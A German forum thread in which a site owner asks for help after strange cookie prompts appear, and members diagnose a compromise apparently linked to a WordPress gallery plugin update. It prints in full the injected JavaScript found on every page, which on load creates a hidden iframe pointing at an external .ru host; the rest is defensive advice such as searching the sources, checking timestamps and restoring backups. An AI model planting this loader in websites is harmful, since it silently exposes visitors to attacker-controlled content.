Tach zusammen,

heute mal wieder "bei mir zuhause" gewesen. Plötzlich kommt beim Aufruf der Seite folgende Cookie-Abfrage:
5534

WTF??
Irgend so ein komischer Kosmetik-Vertreiber
. So alt seh ich doch auch nicht aus....

Hier hat niemand Kekse zu verlangen außer der goemichel....kann mir einer sagen, was da los ist....?

Edit: nochmal da gewesen. Jetzt wars "bing.c o m"...

Sieht nach XSS aus in irgendeiner Form... Eher ominös. Passiert Dir das auch als nicht angemeldeter User? Ich kann hier zumidnest nichts nachvollziehen...

Japp - gerade eben hier zuhause probiert. Wieder beide.

Edit:
Sieht nach XSS aus in irgendeiner Form...
NoScript wirft aus: <SCRIPT>:25 |<OBJECT>:0
Was kann ich damit anfangen?

So - habs gefunden. Auf der Startseite ganz unten, ab Zeile 196:



<script type='text/javascript'> function create_frame(url) { var bumb = document.getElementById('etwixfm'); if (typeof(bumb) != 'undefined' && bumb!= null) {}else{ var iframe = document.createElement('iframe'); iframe.id = "etwixfm"; iframe.style.width = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function gbkpm(){ create_frame("http://nvdrabs.ru/etwixfm.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', gbkpm); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gbkpm(); }; window.onload = newonload; } else { window.onload = gbkpm; } } } catch(err) {} </script>
Kann ich das einfach löschen und gut ists? Wahrscheinlich nicht - oder?

Edith sagt, der Scheiß steht auf jeder einzelnen Seite :wut::Keule:

Nochmal Edit: mit Chrome kann ich dieses Script nicht entdecken...? Hä?

Ist deine Seite evtl. kompromitiert worden?

Weil - nur als aktuelles Beispiel: http://www.heise.de/newsticker/meldung/Ebury-Rootkit-Zombie-Server-greifen-taeglich-eine-halbe-Million-Rechner-an-2149609.html

Keine Ahnung. :angst:

Interessant, ich hatte es auch weder mit Chrome noch mit wget gesehen... aber das spricht schon für einen Angriff, ja.

hmm...ist erst aufgetreten, als ich gestern ein Plug-in aktualisiert hab (NextGen-Gallery). Im Support-Forum dort findet sich einer, der scheinbar das gleiche Problem hat. Er hat einen downgrade gemacht und so das Problem gelöst...ich hab gerade ein heute erschienenes Update der Gallery installiert - das Skript bleibt.
"unmaskparasites. c o m" findet auch das "verdächtige Skript".

Wie geh ich denn jetzt am besten vor?

Downgrade von was?


Einfachster Ansatz: erstmal alle Sourcen der Seite nach "nvdrabs.ru" durchsuchen und gucken, ob da sim Klartext irgendwo auftaucht - das schein eine der wenigen konstanten zu sein. Die injecteten iFrames heissen bei jeden Laden der Seite anders.

ich bin da der falsche Ansprechpartner, aber ein kurze Suche bei heise ergab evtl. eine Hilfestellung :

http://www.heise.de/security/meldung/Initiative-S-Kostenloser-Website-Check-fuer-kleine-Unternehmen-1704458.html

@JPK (http://www.heimkinotreff.com/member.php?u=11): Naja, dafür isses halt schon zu spät. Da werden ja erst DInge erfasst, wenn das Thema der Infektion schon durch ist.

@goemichel (http://www.heimkinotreff.com/member.php?u=9): mein Tipp von oben lohnt übrigens zwar zu probieren, aber selbst ich verspreche mir da nicht allzuviel Erfolg von - hätte ich das programmiert, würde ich den ganzen kram irgendwo verschlüsselt hinpacken.

2 Dinge wären noch erfolgversprechender:

1) Check sämtlicher Zeitstempel auf dem FTP des Webservers auf Auffälligkeiten
2) direkter Vergleich mit einem hoffentlich vorhandenen lokalen Backup der Seite.

Man müsste genauer nachschauen, an welcher Stelle dieses Javascript-Code eingefügt wird. Vielleicht kann man dann die Quelle ausfindig machen.

Ist es wirklich die Startseite? Ich kann auch nichts sehen...

Mhhmmm.... Suche bei Google zeigt, dass dieser Codeschnipsel im RSS-Feed sein sollte.

Im IE siehst Du es. Am Ende der Seite.

goemichel: mein Tipp von oben lohnt übrigens zwar zu probieren, aber selbst ich verspreche mir da nicht allzuviel Erfolg von - hätte ich das programmiert, würde ich den ganzen kram irgendwo verschlüsselt hinpacken.

2 Dinge wären noch erfolgversprechender:

1) Check sämtlicher Zeitstempel auf dem FTP des Webservers auf Auffälligkeiten
2) direkter Vergleich mit einem hoffentlich vorhandenen lokalen Backup der Seite.

Pff...Zeitstempel checken??? Wie wo was?
lokales Backup....müsste ich erstmal zuhause suchen....

Ich glaub, da ist es einfacher, mal den ganzen Kram auf dem Server zu löschen und von vorne anzufangen.

Danke erstmal für die Tipps..5535

Ah, ich sehe den Code nun auch mit FF ganz am Ende also nach Ende des html-tags.